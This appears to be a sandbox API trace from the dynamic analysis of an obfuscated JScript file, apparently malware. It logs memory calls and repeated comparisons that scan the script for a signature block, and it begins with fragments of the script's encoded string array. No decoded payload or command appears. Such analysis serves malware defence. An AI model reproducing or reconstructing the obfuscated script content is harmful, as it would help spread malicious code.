,'woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 19304
	[0052.663] realloc (_Block=0x44dfd0, _Size=0x96d0) returned 0x44dfd0
	[0052.663] ??2@YAPEAX_K@Z () returned 0x31f0b0
	[0052.664] free (_Block=0x44dfd0) 
	[0052.664] ??3@YAXPEAX@Z () returned 0x15720801
	[0052.664] ??3@YAXPEAX@Z () returned 0x15720801
	[0052.664] ??3@YAXPEAX@Z () returned 0x15720801
	[0052.664] ??3@YAXPEAX@Z () returned 0x15720801
	[0052.664] ??3@YAXPEAX@Z () returned 0x15720801
	[0052.664] ??3@YAXPEAX@Z () returned 0x15720801
	[0052.664] CoUninitialize () 
	[0052.664] ??3@YAXPEAX@Z () returned 0x15720801
	[0052.664] CloseHandle (hObject=0x140) returned 1
	[0052.664] wcsncmp (_String1="var dogoswoisosfhsdiefgssqda=['wq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0052.664] wcsncmp (_String1="ar dogoswoisosfhsdiefgssqda=['wqt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0052.664] wcsncmp (_String1="r dogoswoisosfhsdiefgssqda=['wqto", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0052.664] wcsncmp (_String1=" dogoswoisosfhsdiefgssqda=['wqtow", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 19
	[0052.664] wcsncmp (_String1="dogoswoisosfhsdiefgssqda=['wqtowq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0052.664] wcsncmp (_String1="ogoswoisosfhsdiefgssqda=['wqtowqj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0052.664] wcsncmp (_String1="goswoisosfhsdiefgssqda=['wqtowqjC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0052.664] wcsncmp (_String1="oswoisosfhsdiefgssqda=['wqtowqjCl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0052.665] wcsncmp (_String1="swoisosfhsdiefgssqda=['wqtowqjClg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0052.665] wcsncmp (_String1="woisosfhsdiefgssqda=['wqtowqjClg=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0052.665] wcsncmp (_String1="oisosfhsdiefgssqda=['wqtowqjClg==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0052.665] wcsncmp (_String1="isosfhsdiefgssqda=['wqtowqjClg=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0052.665] wcsncmp (_String1="sosfhsdiefgssqda=['wqtowqjClg==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0052.665] wcsncmp (_String1="osfhsdiefgssqda=['wqtowqjClg==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0052.665] wcsncmp (_String1="sfhsdiefgssqda=['wqtowqjClg==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0052.665] wcsncmp (_String1="fhsdiefgssqda=['wqtowqjClg==','w5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0052.665] wcsncmp (_String1="hsdiefgssqda=['wqtowqjClg==','w5M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0052.665] wcsncmp (_String1="sdiefgssqda=['wqtowqjClg==','w5Mc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0052.665] wcsncmp (_String1="diefgssqda=['wqtowqjClg==','w5Mcw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0052.665] wcsncmp (_String1="iefgssqda=['wqtowqjClg==','w5Mcwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0052.665] wcsncmp (_String1="efgssqda=['wqtowqjClg==','w5Mcwr/", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88
	[0052.665] wcsncmp (_String1="fgssqda=['wqtowqjClg==','w5Mcwr/D", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0052.665] wcsncmp (_String1="gssqda=['wqtowqjClg==','w5Mcwr/Dv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0052.665] wcsncmp (_String1="ssqda=['wqtowqjClg==','w5Mcwr/Dvc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0052.665] wcsncmp (_String1="sqda=['wqtowqjClg==','w5Mcwr/DvcO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0052.666] wcsncmp (_String1="qda=['wqtowqjClg==','w5Mcwr/DvcOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0052.666] wcsncmp (_String1="da=['wqtowqjClg==','w5Mcwr/DvcOsK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0052.666] wcsncmp (_String1="a=['wqtowqjClg==','w5Mcwr/DvcOsK2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0052.666] wcsncmp (_String1="=['wqtowqjClg==','w5Mcwr/DvcOsK2c", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0052.666] wcsncmp (_String1="['wqtowqjClg==','w5Mcwr/DvcOsK2cu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 78
	[0052.666] wcsncmp (_String1="'wqtowqjClg==','w5Mcwr/DvcOsK2cuB", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0052.666] wcsncmp (_String1="wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0052.666] wcsncmp (_String1="qtowqjClg==','w5Mcwr/DvcOsK2cuBQ=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0052.666] wcsncmp (_String1="towqjClg==','w5Mcwr/DvcOsK2cuBQ==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0052.666] wcsncmp (_String1="owqjClg==','w5Mcwr/DvcOsK2cuBQ=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0052.666] wcsncmp (_String1="wqjClg==','w5Mcwr/DvcOsK2cuBQ==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0052.666] wcsncmp (_String1="qjClg==','w5Mcwr/DvcOsK2cuBQ==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0052.666] wcsncmp (_String1="jClg==','w5Mcwr/DvcOsK2cuBQ==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0052.666] wcsncmp (_String1="Clg==','w5Mcwr/DvcOsK2cuBQ==','wr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0052.666] wcsncmp (_String1="lg==','w5Mcwr/DvcOsK2cuBQ==','wrv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0052.666] wcsncmp (_String1="g==','w5Mcwr/DvcOsK2cuBQ==','wrvD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0052.666] wcsncmp (_String1="==','w5Mcwr/DvcOsK2cuBQ==','wrvDp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0052.666] wcsncmp (_String1="=','w5Mcwr/DvcOsK2cuBQ==','wrvDps", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0052.666] wcsncmp (_String1="','w5Mcwr/DvcOsK2cuBQ==','wrvDpsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0052.666] wcsncmp (_String1=",'w5Mcwr/DvcOsK2cuBQ==','wrvDpsOq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0052.666] wcsncmp (_String1="'w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0052.666] wcsncmp (_String1="w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0052.666] wcsncmp (_String1="5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0052.666] wcsncmp (_String1="Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0052.666] wcsncmp (_String1="cwr/DvcOsK2cuBQ==','wrvDpsOqD8KNw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0052.666] wcsncmp (_String1="wr/DvcOsK2cuBQ==','wrvDpsOqD8KNwp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0052.666] wcsncmp (_String1="r/DvcOsK2cuBQ==','wrvDpsOqD8KNwpb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0052.666] wcsncmp (_String1="/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 34
	[0052.666] wcsncmp (_String1="DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0052.666] wcsncmp (_String1="vcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0052.666] wcsncmp (_String1="cOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0052.666] wcsncmp (_String1="OsK2cuBQ==','wrvDpsOqD8KNwpbCjh8p", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0052.666] wcsncmp (_String1="sK2cuBQ==','wrvDpsOqD8KNwpbCjh8pa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0052.667] wcsncmp (_String1="K2cuBQ==','wrvDpsOqD8KNwpbCjh8pas", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0052.667] wcsncmp (_String1="2cuBQ==','wrvDpsOqD8KNwpbCjh8pasK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37
	[0052.667] wcsncmp (_String1="cuBQ==','wrvDpsOqD8KNwpbCjh8pasKg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0052.667] wcsncmp (_String1="uBQ==','wrvDpsOqD8KNwpbCjh8pasKgV", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104
	[0052.667] wcsncmp (_String1="BQ==','wrvDpsOqD8KNwpbCjh8pasKgV8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 53
	[0052.667] wcsncmp (_String1="Q==','wrvDpsOqD8KNwpbCjh8pasKgV8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68
	[0052.667] wcsncmp (_String1="==','wrvDpsOqD8KNwpbCjh8pasKgV8Oz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0052.667] wcsncmp (_String1="=','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0052.667] wcsncmp (_String1="','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0052.667] wcsncmp (_String1=",'wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1x", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0052.667] wcsncmp (_String1="'wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0052.667] wcsncmp (_String1="wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0052.667] wcsncmp (_String1="rvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0052.667] wcsncmp (_String1="vDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7j", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0052.667] wcsncmp (_String1="DpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0052.667] wcsncmp (_String1="psOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0052.667] wcsncmp (_String1="sOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0052.667] wcsncmp (_String1="OqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0052.667] wcsncmp (_String1="qD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Ow", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0052.667] wcsncmp (_String1="D8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Oww", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0052.667] wcsncmp (_String1="8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Owwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0052.667] wcsncmp (_String1="KNwpbCjh8pasKgV8Ozb1xZw7jDu8Owwrt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0052.667] wcsncmp (_String1="NwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtS", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65
	[0052.667] wcsncmp (_String1="wpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0052.667] wcsncmp (_String1="pbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0052.667] wcsncmp (_String1="bCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0052.667] wcsncmp (_String1="Cjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0052.667] wcsncmp (_String1="jh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0052.667] wcsncmp (_String1="h8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0052.667] wcsncmp (_String1="8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0052.667] wcsncmp (_String1="pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0052.667] wcsncmp (_String1="asKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0052.667] wcsncmp (_String1="sKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0052.667] wcsncmp (_String1="KgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0X", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0052.668] wcsncmp (_String1="gV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0052.668] wcsncmp (_String1="V8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 73
	[0052.668] wcsncmp (_String1="8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0052.668] wcsncmp (_String1="Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0052.668] wcsncmp (_String1="zb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 109
	[0052.668] wcsncmp (_String1="b1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0052.668] wcsncmp (_String1="1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw6", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36
	[0052.668] wcsncmp (_String1="xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107
	[0052.668] wcsncmp (_String1="Zw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69D", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0052.668] wcsncmp (_String1="w7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0052.668] wcsncmp (_String1="7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42
	[0052.668] wcsncmp (_String1="jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0052.668] wcsncmp (_String1="Du8OwwrtSXDnDgMOwa0XCr8OAw69Dw79y", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0052.668] wcsncmp (_String1="u8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104
	[0052.668] wcsncmp (_String1="8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0052.668] wcsncmp (_String1="OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0052.668] wcsncmp (_String1="wwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0052.668] wcsncmp (_String1="wrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0052.668] wcsncmp (_String1="rtSXDnDgMOwa0XCr8OAw69Dw79yA8OW',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0052.668] wcsncmp (_String1="tSXDnDgMOwa0XCr8OAw69Dw79yA8OW','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0052.668] wcsncmp (_String1="SXDnDgMOwa0XCr8OAw69Dw79yA8OW','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 70
	[0052.669] wcsncmp (_String1="XDnDgMOwa0XCr8OAw69Dw79yA8OW','w5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0052.669] wcsncmp (_String1="DnDgMOwa0XCr8OAw69Dw79yA8OW','w5/", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0052.669] wcsncmp (_String1="nDgMOwa0XCr8OAw69Dw79yA8OW','w5/C", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0052.669] wcsncmp (_String1="DgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0052.669] wcsncmp (_String1="gMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0052.669] wcsncmp (_String1="MOwa0XCr8OAw69Dw79yA8OW','w5/Cn8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0052.669] wcsncmp (_String1="Owa0XCr8OAw69Dw79yA8OW','w5/Cn8KK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0052.669] wcsncmp (_String1="wa0XCr8OAw69Dw79yA8OW','w5/Cn8KKb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0052.669] wcsncmp (_String1="a0XCr8OAw69Dw79yA8OW','w5/Cn8KKbM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0052.669] wcsncmp (_String1="0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 35
	[0052.669] wcsncmp (_String1="XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0052.669] wcsncmp (_String1="Cr8OAw69Dw79yA8OW','w5/Cn8KKbMK5H", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0052.669] wcsncmp (_String1="r8OAw69Dw79yA8OW','w5/Cn8KKbMK5Hs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0052.669] wcsncmp (_String1="8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0052.669] wcsncmp (_String1="OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOe", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0052.669] wcsncmp (_String1="Aw69Dw79yA8OW','w5/Cn8KKbMK5HsOef", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0052.669] wcsncmp (_String1="w69Dw79yA8OW','w5/Cn8KKbMK5HsOefs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0052.669] wcsncmp (_String1="69Dw79yA8OW','w5/Cn8KKbMK5HsOefsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 41
	[0052.669] wcsncmp (_String1="9Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 44
	[0052.669] wcsncmp (_String1="Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0052.669] wcsncmp (_String1="w79yA8OW','w5/Cn8KKbMK5HsOefsOg',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0052.669] wcsncmp (_String1="79yA8OW','w5/Cn8KKbMK5HsOefsOg','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42
	[0052.670] wcsncmp (_String1="9yA8OW','w5/Cn8KKbMK5HsOefsOg','M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 44
	[0052.670] wcsncmp (_String1="yA8OW','w5/Cn8KKbMK5HsOefsOg','ME", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 108
	[0052.670] wcsncmp (_String1="A8OW','w5/Cn8KKbMK5HsOefsOg','MEr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0052.670] wcsncmp (_String1="8OW','w5/Cn8KKbMK5HsOefsOg','MErC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0052.670] wcsncmp (_String1="OW','w5/Cn8KKbMK5HsOefsOg','MErCs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0052.670] wcsncmp (_String1="W','w5/Cn8KKbMK5HsOefsOg','MErCsE", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 74
	[0052.670] wcsncmp (_String1="','w5/Cn8KKbMK5HsOefsOg','MErCsEP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0052.670] wcsncmp (_String1=",'w5/Cn8KKbMK5HsOefsOg','MErCsEPD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0052.670] wcsncmp (_String1="'w5/Cn8KKbMK5HsOefsOg','MErCsEPDh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0052.670] wcsncmp (_String1="w5/Cn8KKbMK5HsOefsOg','MErCsEPDhc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0052.670] wcsncmp (_String1="5/Cn8KKbMK5HsOefsOg','MErCsEPDhcK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0052.670] wcsncmp (_String1="/Cn8KKbMK5HsOefsOg','MErCsEPDhcKa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 34
	[0052.670] wcsncmp (_String1="Cn8KKbMK5HsOefsOg','MErCsEPDhcKac", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0052.670] wcsncmp (_String1="n8KKbMK5HsOefsOg','MErCsEPDhcKacR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0052.670] wcsncmp (_String1="8KKbMK5HsOefsOg','MErCsEPDhcKacRH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0052.670] wcsncmp (_String1="KKbMK5HsOefsOg','MErCsEPDhcKacRHC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0052.670] wcsncmp (_String1="KbMK5HsOefsOg','MErCsEPDhcKacRHCm", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0052.670] wcsncmp (_String1="bMK5HsOefsOg','MErCsEPDhcKacRHCmA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0052.670] wcsncmp (_String1="MK5HsOefsOg','MErCsEPDhcKacRHCmA=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
